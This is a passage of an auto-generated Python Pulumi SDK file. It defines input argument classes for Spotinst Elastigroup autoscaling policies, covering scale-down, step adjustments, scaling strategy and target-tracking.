        """
        :param pulumi.Input[str] metric_name: The name of the metric, with or without spaces.
        :param pulumi.Input[str] namespace: The namespace for the alarm's associated metric.
        :param pulumi.Input[str] policy_name: The name of the policy.
        :param pulumi.Input[str] action_type: The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
        :param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
        :param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
        :param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
        :param pulumi.Input[bool] is_enabled: Specifies whether the scaling policy described in this block is enabled.
        :param pulumi.Input[str] max_target_capacity: The number of the desired target (and maximum) capacity. Required if using `"setMaxTarget"` as action type.
        :param pulumi.Input[str] maximum: The maximal number of instances to have in the group.
        :param pulumi.Input[str] min_target_capacity: The desired target capacity of a group. Required if using `"setMinTarget"` as action type
        :param pulumi.Input[str] minimum: The minimal number of instances to have in the group.
        :param pulumi.Input[str] operator: The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
        :param pulumi.Input[int] period: The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
        :param pulumi.Input[str] source: The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
        :param pulumi.Input[str] statistic: The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentArgs']]] step_adjustments: A list of step adjustments, each pairing a threshold with the action to take when it is crossed.
        :param pulumi.Input[str] target: The target number of instances to have in the group.
        :param pulumi.Input[float] threshold: The value against which the specified statistic is compared in order to determine if a step should be applied.
        :param pulumi.Input[str] unit: The unit for the alarm's associated metric. Valid values: `"percent"`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
        """
        pulumi.set(__self__, "metric_name", metric_name)
        pulumi.set(__self__, "namespace", namespace)
        pulumi.set(__self__, "policy_name", policy_name)
        if action_type is not None:
            pulumi.set(__self__, "action_type", action_type)
        if adjustment is not None:
            pulumi.set(__self__, "adjustment", adjustment)
        if cooldown is not None:
            pulumi.set(__self__, "cooldown", cooldown)
        if dimensions is not None:
            pulumi.set(__self__, "dimensions", dimensions)
        if evaluation_periods is not None:
            pulumi.set(__self__, "evaluation_periods", evaluation_periods)
        if is_enabled is not None:
            pulumi.set(__self__, "is_enabled", is_enabled)
        if max_target_capacity is not None:
            pulumi.set(__self__, "max_target_capacity", max_target_capacity)
        if maximum is not None:
            pulumi.set(__self__, "maximum", maximum)
        if min_target_capacity is not None:
            pulumi.set(__self__, "min_target_capacity", min_target_capacity)
        if minimum is not None:
            pulumi.set(__self__, "minimum", minimum)
        if operator is not None:
            pulumi.set(__self__, "operator", operator)
        if period is not None:
            pulumi.set(__self__, "period", period)
        if source is not None:
            pulumi.set(__self__, "source", source)
        if statistic is not None:
            pulumi.set(__self__, "statistic", statistic)
        if step_adjustments is not None:
            pulumi.set(__self__, "step_adjustments", step_adjustments)
        if target is not None:
            pulumi.set(__self__, "target", target)
        if threshold is not None:
            pulumi.set(__self__, "threshold", threshold)
        if unit is not None:
            pulumi.set(__self__, "unit", unit)

    @property
    @pulumi.getter(name="metricName")
    def metric_name(self) -> pulumi.Input[str]:
        """
        The name of the metric, with or without spaces.
        """
        return pulumi.get(self, "metric_name")

    @metric_name.setter
    def metric_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "metric_name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """
        The namespace for the alarm's associated metric.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="policyName")
    def policy_name(self) -> pulumi.Input[str]:
        """
        The name of the policy.
        """
        return pulumi.get(self, "policy_name")

    @policy_name.setter
    def policy_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "policy_name", value)

    @property
    @pulumi.getter(name="actionType")
    def action_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
        """
        return pulumi.get(self, "action_type")

    @action_type.setter
    def action_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "action_type", value)

    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """
        The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
        """
        return pulumi.get(self, "adjustment")

    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)

    @property
    @pulumi.getter
    def cooldown(self) -> Optional[pulumi.Input[int]]:
        """
        The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
        """
        return pulumi.get(self, "cooldown")

    @cooldown.setter
    def cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cooldown", value)

    @property
    @pulumi.getter
    def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]]:
        """
        A list of dimensions describing qualities of the metric.
        """
        return pulumi.get(self, "dimensions")

    @dimensions.setter
    def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]]):
        pulumi.set(self, "dimensions", value)

    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """
        The number of periods over which data is compared to the specified threshold.
        """
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the scaling policy described in this block is enabled.
        """
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="maxTargetCapacity")
    def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        The number of the desired target (and maximum) capacity. Required if using `"setMaxTarget"` as action type.
        """
        return pulumi.get(self, "max_target_capacity")

    @max_target_capacity.setter
    def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_target_capacity", value)

    @property
    @pulumi.getter
    def maximum(self) -> Optional[pulumi.Input[str]]:
        """
        The maximal number of instances to have in the group.
        """
        return pulumi.get(self, "maximum")

    @maximum.setter
    def maximum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "maximum", value)

    @property
    @pulumi.getter(name="minTargetCapacity")
    def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        The desired target capacity of a group. Required if using `"setMinTarget"` as action type
        """
        return pulumi.get(self, "min_target_capacity")

    @min_target_capacity.setter
    def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_target_capacity", value)

    @property
    @pulumi.getter
    def minimum(self) -> Optional[pulumi.Input[str]]:
        """
        The minimal number of instances to have in the group.
        """
        return pulumi.get(self, "minimum")

    @minimum.setter
    def minimum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "minimum", value)

    @property
    @pulumi.getter
    def operator(self) -> Optional[pulumi.Input[str]]:
        """
        The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
        """
        return pulumi.get(self, "operator")

    @operator.setter
    def operator(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "operator", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """
        The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
        """
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter
    def source(self) -> Optional[pulumi.Input[str]]:
        """
        The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
        """
        return pulumi.get(self, "source")

    @source.setter
    def source(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source", value)

    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """
        The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
        """
        return pulumi.get(self, "statistic")

    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statistic", value)

    @property
    @pulumi.getter(name="stepAdjustments")
    def step_adjustments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentArgs']]]]:
        """
        A list of step adjustments, each pairing a threshold with the action to take when it is crossed.
        """
        return pulumi.get(self, "step_adjustments")

    @step_adjustments.setter
    def step_adjustments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentArgs']]]]):
        pulumi.set(self, "step_adjustments", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """
        The target number of instances to have in the group.
        """
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)

    @property
    @pulumi.getter
    def threshold(self) -> Optional[pulumi.Input[float]]:
        """
        The value against which the specified statistic is compared in order to determine if a step should be applied.
        """
        return pulumi.get(self, "threshold")

    @threshold.setter
    def threshold(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "threshold", value)

    @property
    @pulumi.getter
    def unit(self) -> Optional[pulumi.Input[str]]:
        """
        The unit for the alarm's associated metric. Valid values: `"percent"`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
        """
        return pulumi.get(self, "unit")

    @unit.setter
    def unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyDimensionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 value: Optional[pulumi.Input[str]] = None):
        """
        A single dimension (name/value pair) qualifying the policy's metric.

        :param pulumi.Input[str] name: The dimension name.
        :param pulumi.Input[str] value: The dimension value.
        """
        pulumi.set(__self__, "name", name)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The dimension name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The dimension value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyStepAdjustmentArgs:
    def __init__(__self__, *,
                 action: pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs'],
                 threshold: pulumi.Input[int]):
        """
        A single step adjustment: the action to take once its threshold is crossed.
        Both fields are required.

        :param pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs'] action: The action to take when this step's threshold is crossed.
        :param pulumi.Input[int] threshold: The value against which the specified statistic is compared.
        """
        pulumi.set(__self__, "action", action)
        pulumi.set(__self__, "threshold", threshold)

    @property
    @pulumi.getter
    def action(self) -> pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs']:
        """
        The action to take when this step's threshold is crossed.
        """
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs']):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter
    def threshold(self) -> pulumi.Input[int]:
        """
        The value against which the specified statistic is compared.
        """
        return pulumi.get(self, "threshold")

    @threshold.setter
    def threshold(self, value: pulumi.Input[int]):
        pulumi.set(self, "threshold", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyStepAdjustmentActionArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 adjustment: Optional[pulumi.Input[str]] = None,
                 max_target_capacity: Optional[pulumi.Input[str]] = None,
                 maximum: Optional[pulumi.Input[str]] = None,
                 min_target_capacity: Optional[pulumi.Input[str]] = None,
                 minimum: Optional[pulumi.Input[str]] = None,
                 target: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] type: The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`.
        :param pulumi.Input[str] adjustment: The number of instances to add or remove.
        :param pulumi.Input[str] max_target_capacity: The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
        :param pulumi.Input[str] maximum: The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` is defined.
        :param pulumi.Input[str] min_target_capacity: The desired target capacity of a group. Required if using `"setMinTarget"` as action type
        :param pulumi.Input[str] minimum: The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` is defined.
        :param pulumi.Input[str] target: The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` is defined.
        """
        pulumi.set(__self__, "type", type)
        if adjustment is not None:
            pulumi.set(__self__, "adjustment", adjustment)
        if max_target_capacity is not None:
            pulumi.set(__self__, "max_target_capacity", max_target_capacity)
        if maximum is not None:
            pulumi.set(__self__, "maximum", maximum)
        if min_target_capacity is not None:
            pulumi.set(__self__, "min_target_capacity", min_target_capacity)
        if minimum is not None:
            pulumi.set(__self__, "minimum", minimum)
        if target is not None:
            pulumi.set(__self__, "target", target)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """
        The number of instances to add or remove.
        """
        return pulumi.get(self, "adjustment")

    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)

    @property
    @pulumi.getter(name="maxTargetCapacity")
    def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
        """
        return pulumi.get(self, "max_target_capacity")

    @max_target_capacity.setter
    def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_target_capacity", value)

    @property
    @pulumi.getter
    def maximum(self) -> Optional[pulumi.Input[str]]:
        """
        The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` is defined.
        """
        return pulumi.get(self, "maximum")

    @maximum.setter
    def maximum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "maximum", value)

    @property
    @pulumi.getter(name="minTargetCapacity")
    def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        The desired target capacity of a group. Required if using `"setMinTarget"` as action type
        """
        return pulumi.get(self, "min_target_capacity")

    @min_target_capacity.setter
    def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_target_capacity", value)

    @property
    @pulumi.getter
    def minimum(self) -> Optional[pulumi.Input[str]]:
        """
        The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` is defined.
        """
        return pulumi.get(self, "minimum")

    @minimum.setter
    def minimum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "minimum", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """
        The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` is defined.
        """
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)
@pulumi.input_type
class ElastigroupScalingStrategyArgs:
    def __init__(__self__, *,
                 terminate_at_end_of_billing_hour: Optional[pulumi.Input[bool]] = None,
                 termination_policy: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[bool] terminate_at_end_of_billing_hour: Specify whether to terminate instances at the end of each billing hour.
        :param pulumi.Input[str] termination_policy: Determines whether to terminate the newest instances when performing a scaling action. Valid values: `"default"`, `"newestInstance"`.
        """
        if terminate_at_end_of_billing_hour is not None:
            pulumi.set(__self__, "terminate_at_end_of_billing_hour", terminate_at_end_of_billing_hour)
        if termination_policy is not None:
            pulumi.set(__self__, "termination_policy", termination_policy)

    @property
    @pulumi.getter(name="terminateAtEndOfBillingHour")
    def terminate_at_end_of_billing_hour(self) -> Optional[pulumi.Input[bool]]:
        """
        Specify whether to terminate instances at the end of each billing hour.
        """
        return pulumi.get(self, "terminate_at_end_of_billing_hour")

    @terminate_at_end_of_billing_hour.setter
    def terminate_at_end_of_billing_hour(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "terminate_at_end_of_billing_hour", value)

    @property
    @pulumi.getter(name="terminationPolicy")
    def termination_policy(self) -> Optional[pulumi.Input[str]]:
        """
        Determines whether to terminate the newest instances when performing a scaling action. Valid values: `"default"`, `"newestInstance"`.
        """
        return pulumi.get(self, "termination_policy")

    @termination_policy.setter
    def termination_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "termination_policy", value)
@pulumi.input_type
class ElastigroupScalingTargetPolicyArgs:
    """Input arguments for an Elastigroup target-tracking scaling policy."""

    def __init__(__self__, *,
                 metric_name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 policy_name: pulumi.Input[str],
                 target: pulumi.Input[float],
                 cooldown: Optional[pulumi.Input[int]] = None,
                 dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]]] = None,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 max_capacity_per_scale: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 predictive_mode: Optional[pulumi.Input[str]] = None,
                 source: Optional[pulumi.Input[str]] = None,
                 statistic: Optional[pulumi.Input[str]] = None,
                 unit: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] metric_name: String, the name of the metric, with or without spaces.
        :param pulumi.Input[str] namespace: String, the namespace for the alarm's associated metric.
        :param pulumi.Input[str] policy_name: String, the name of the policy.
        :param pulumi.Input[float] target: The target number of instances to have in the group.
        :param pulumi.Input[int] cooldown: Integer, the amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
        :param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
        :param pulumi.Input[str] max_capacity_per_scale: String, restrict the maximal number of instances which can be added in each scale-up action.
        :param pulumi.Input[int] period: The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
        :param pulumi.Input[str] predictive_mode: Start a metric prediction process to determine the expected target metric value within the next two days. See [Predictive Autoscaling](https://api.spotinst.com/elastigroup-for-aws/concepts/scaling-concepts/predictive-autoscaling/) documentation for more info. Valid values: `FORECAST_AND_SCALE`, `FORECAST_ONLY`.
        :param pulumi.Input[str] source: String, the source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
        :param pulumi.Input[str] statistic: String, the metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
        :param pulumi.Input[str] unit: String, the unit for the alarm's associated metric. Valid values: `"percent"`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
        """
        # Required arguments are always stored.
        pulumi.set(__self__, "metric_name", metric_name)
        pulumi.set(__self__, "namespace", namespace)
        pulumi.set(__self__, "policy_name", policy_name)
        pulumi.set(__self__, "target", target)
        # Optional arguments are stored only when explicitly provided, so that
        # unset values never appear in the serialized input type.
        for arg_name, arg_value in (
                ("cooldown", cooldown),
                ("dimensions", dimensions),
                ("evaluation_periods", evaluation_periods),
                ("max_capacity_per_scale", max_capacity_per_scale),
                ("period", period),
                ("predictive_mode", predictive_mode),
                ("source", source),
                ("statistic", statistic),
                ("unit", unit)):
            if arg_value is not None:
                pulumi.set(__self__, arg_name, arg_value)

    @property
    @pulumi.getter(name="metricName")
    def metric_name(self) -> pulumi.Input[str]:
        """
        String, the name of the metric, with or without spaces.
        """
        return pulumi.get(self, "metric_name")

    @metric_name.setter
    def metric_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "metric_name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """
        String, the namespace for the alarm's associated metric.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="policyName")
    def policy_name(self) -> pulumi.Input[str]:
        """
        String, the name of the policy.
        """
        return pulumi.get(self, "policy_name")

    @policy_name.setter
    def policy_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "policy_name", value)

    @property
    @pulumi.getter
    def target(self) -> pulumi.Input[float]:
        """
        The target number of instances to have in the group.
        """
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: pulumi.Input[float]):
        pulumi.set(self, "target", value)

    @property
    @pulumi.getter
    def cooldown(self) -> Optional[pulumi.Input[int]]:
        """
        Integer, the amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
        """
        return pulumi.get(self, "cooldown")

    @cooldown.setter
    def cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cooldown", value)

    @property
    @pulumi.getter
    def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]]]:
        """
        A list of dimensions describing qualities of the metric.
        """
        return pulumi.get(self, "dimensions")

    @dimensions.setter
    def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]]]):
        pulumi.set(self, "dimensions", value)

    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """
        How many evaluation periods should accumulate before a scale down action takes place.
        """
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)

    @property
    @pulumi.getter(name="maxCapacityPerScale")
    def max_capacity_per_scale(self) -> Optional[pulumi.Input[str]]:
        """
        String, restrict the maximal number of instances which can be added in each scale-up action.
        """
        return pulumi.get(self, "max_capacity_per_scale")

    @max_capacity_per_scale.setter
    def max_capacity_per_scale(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_capacity_per_scale", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """
        The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
        """
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter(name="predictiveMode")
    def predictive_mode(self) -> Optional[pulumi.Input[str]]:
        """
        Start a metric prediction process to determine the expected target metric value within the next two days. See [Predictive Autoscaling](https://api.spotinst.com/elastigroup-for-aws/concepts/scaling-concepts/predictive-autoscaling/) documentation for more info. Valid values: `FORECAST_AND_SCALE`, `FORECAST_ONLY`.
        """
        return pulumi.get(self, "predictive_mode")

    @predictive_mode.setter
    def predictive_mode(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "predictive_mode", value)

    @property
    @pulumi.getter
    def source(self) -> Optional[pulumi.Input[str]]:
        """
        String, the source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
        """
        return pulumi.get(self, "source")

    @source.setter
    def source(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source", value)

    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """
        String, the metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
        """
        return pulumi.get(self, "statistic")

    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statistic", value)

    @property
    @pulumi.getter
    def unit(self) -> Optional[pulumi.Input[str]]:
        """
        String, the unit for the alarm's associated metric. Valid values: `"percent"`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
        """
        return pulumi.get(self, "unit")

    @unit.setter
    def unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupScalingTargetPolicyDimensionArgs:
    """A single CloudWatch-style metric dimension for a target scaling policy."""

    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 value: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: The record set name.
        :param pulumi.Input[str] value: The dimension value.
        """
        # ``name`` is required; ``value`` is recorded only when supplied.
        provided = {"name": name}
        if value is not None:
            provided["value"] = value
        for key, val in provided.items():
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The record set name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The dimension value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyArgs:
    """Input arguments for an Elastigroup scale-up policy."""

    def __init__(__self__, *,
                 metric_name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 policy_name: pulumi.Input[str],
                 action_type: Optional[pulumi.Input[str]] = None,
                 adjustment: Optional[pulumi.Input[str]] = None,
                 cooldown: Optional[pulumi.Input[int]] = None,
                 dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]]] = None,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None,
                 max_target_capacity: Optional[pulumi.Input[str]] = None,
                 maximum: Optional[pulumi.Input[str]] = None,
                 min_target_capacity: Optional[pulumi.Input[str]] = None,
                 minimum: Optional[pulumi.Input[str]] = None,
                 operator: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 source: Optional[pulumi.Input[str]] = None,
